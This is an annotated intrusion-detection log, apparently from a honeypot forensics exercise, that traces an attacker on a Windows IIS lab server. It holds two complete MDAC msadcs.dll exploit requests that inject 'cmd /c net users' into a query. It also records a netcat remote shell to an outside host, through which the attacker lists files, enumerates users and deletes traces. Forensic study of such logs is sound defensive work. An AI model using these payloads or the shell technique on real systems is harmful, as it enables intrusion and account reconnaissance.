=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to clean up file 'c:\yay2.txt' (but not c:\Program Files\Common Files\system\msadc\yay2.txt)
[**] netcat session 6969 [**]
02/04-05:49:07.447963 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33658 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x2CBEE05C Ack: 0x9E43FC63 Win: 0x20EE TcpLen: 20
del yay2.txt....C:\>..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:07.919822 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33914 IpLen:20 DgmLen:44 DF
***AP*** Seq: 0x2CBEE072 Ack: 0x9E43FC63 Win: 0x20EE TcpLen: 20
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:14.057447 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37242 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x2CBEE076 Ack: 0x9E43FC7B Win: 0x20D6 TcpLen: 20
net session >>yay3.txt..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries the 'net session' command again from the remote shell but still doesn't have the required privileges
[**] netcat session 6969 [**]
02/04-05:49:14.394221 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37498 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEE08E Ack: 0x9E43FC7D Win: 0x20D4 TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:14.758914 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37754 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEE0D1 Ack: 0x9E43FC80 Win: 0x20D1 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:15.318578 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38010 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0x2CBEE199 Ack: 0x9E43FC80 Win: 0x20D1 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt..02/04/01 06:48a
0 yay3.txt.. 14 File(s) 78,643,522
bytes.. 1,690,861,056 bytes free....C:\
>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:21.271333 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40314 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0x2CBEE460 Ack: 0x9E43FC8E Win: 0x20C3 TcpLen: 20
del yay&.*..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:21.599220 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40570 IpLen:20 DgmLen:182 DF
***AP*** Seq: 0x2CBEE46C Ack: 0x9E43FC91 Win: 0x20C0 TcpLen: 20
Could Not Find C:\yay..The name specified is not recognized as a
n..internal or external command, operable program or batch file.
....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:22.144461 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40826 IpLen:20 DgmLen:951 DF
***AP*** Seq: 0x2CBEE4FA Ack: 0x9E43FC91 Win: 0x20C0 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..11/26/00 12:34p 0 CONFIG.SYS..12/26
/00 07:36p exploits..12/07/00 03:30p
InetPub..12/07/00 03:12p
Multimedia Files..12/26/00 07:10p New
Folder..01/26/01 02:10p 78,643,200 pagefile.sys..12/
21/00 08:59p Program Files..12/21/00 08:
59p TEMP..02/04/01 06:46a
WINNT..12/26/00 07:09p wiretrip..0
2/04/01 06:43a 0 yay.txt..02/04/01 06:48a
0 yay3.txt.. 14 File(s) 78,
643,522 bytes.. 1,690,861,056 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries cleaning up a bit by running 'del yay.*'
!@# This deletes yay3.txt but looks like yay.txt is locked by another process.
[**] netcat session 6969 [**]
02/04-05:49:28.278508 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42618 IpLen:20 DgmLen:156 DF
***AP*** Seq: 0x2CBEE889 Ack: 0x9E43FC9B Win: 0x20B6 TcpLen: 20
del yay*..C:\yay.txt..The process cannot access the file because
..it is being used by another process.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:37.541896 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45178 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x2CBEE8FD Ack: 0x9E43FCA9 Win: 0x20A8 TcpLen: 20
del yay3.txt..Could Not Find C:\yay3.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:38.444008 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45946 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEE933 Ack: 0x9E43FCAE Win: 0x20A3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:38.944406 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:46202 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEE9FB Ack: 0x9E43FCAE Win: 0x20A3 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run 'net users' and append output to file 'heh.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:49:54.324722 213.116.251.162:1930 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12612 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0xA4B7CF0B Ack: 0x2CC52434 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r.s. .>.>.h.e.h...t.x.t.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run 'net users' and append output to file 'c:\heh.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:50:00.058360 213.116.251.162:1932 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12622 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0xA4CF1F07 Ack: 0x2CC53AC7 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 557..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 348..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r.s. .>.>.c.:.\.h.e.h...t.x.t.".).|.'.......d.r.i.v
.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m
.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t
.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WOR
LD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:03.550356 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51322 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEEC91 Ack: 0x9E43FCB3 Win: 0x209E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:04.096869 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51578 IpLen:20 DgmLen:750 DF
***AP*** Seq: 0x2CBEED59 Ack: 0x9E43FCB3 Win: 0x209E TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..02/04/01 06:48a
263 heh.txt..12/07/00 03:30p InetP
ub..12/07/00 03:12p Multimedia Files..12/
26/00 07:10p New Folder..01/26/01 02:10p
78,643,200 pagefile.sys..12/21/00 08:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:48a WINNT..12/26/00
07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,643,785 b
ytes.. 1,690,861,056 bytes free....C:\>
..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:08.257201 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:53626 IpLen:20 DgmLen:172 DF
***AP*** Seq: 0x2CBEF01F Ack: 0x9E43FCC2 Win: 0x208F TcpLen: 20
yuper .......The name specified is not recognized as an..interna
l or external command, operable program or batch file.....C:\>..
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Reads heh.txt from remote shell
[**] netcat session 6969 [**]
02/04-05:50:10.660668 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54906 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF0A3 Ack: 0x9E43FCCE Win: 0x2083 TcpLen: 20
type heh.txt....User accounts for \\.....-----------------------
--------------------------------------------------------..Admini
strator Guest IUSR_KENNY
..I
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:11.200217 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:55162 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0x2CBEF16B Ack: 0x9E43FCCE Win: 0x2083 TcpLen: 20
WAM_KENNY ..The command completed with one or more
errors........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Cleans up 'c:\heh.txt' using remote shell
[**] netcat session 6969 [**]
02/04-05:50:15.267294 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56698 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBEF1C4 Ack: 0x9E43FCDB Win: 0x2076 TcpLen: 20
del heh.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:20.575002 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59002 IpLen:20 DgmLen:96 DF
***AP*** Seq: 0x2CBEF1DD Ack: 0x9E43FCF0 Win: 0x2061 TcpLen: 20
cd program files....C:\Program Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Checks out contents of 'c:\program files\'
[**] netcat session 6969 [**]
02/04-05:50:20.975829 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59258 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF215 Ack: 0x9E43FCF2 Win: 0x205F TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files....12/21/00 08:59p
...12/21/00 08:59p
....12/0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:21.520033 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59514 IpLen:20 DgmLen:645 DF
***AP*** Seq: 0x2CBEF2DD Ack: 0x9E43FCF2 Win: 0x205F TcpLen: 20
7/00 03:11p Common Files..12/21/00 08:59
p D4..12/07/00 03:23p
ICW-Internet Connection Wizard..12/07/00 03:37p
Microsoft FrontPage..12/07/00 03:34p
Mts..12/07/00 03:23p Outlook Expres
s..11/26/00 06:42p Plus!..12/16/00 06:54
p Syslogd..11/26/00 06:56p
Windows NT.. 11 File(s) 0 byte
s.. 1,690,861,056 bytes free....C:\Prog
ram Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+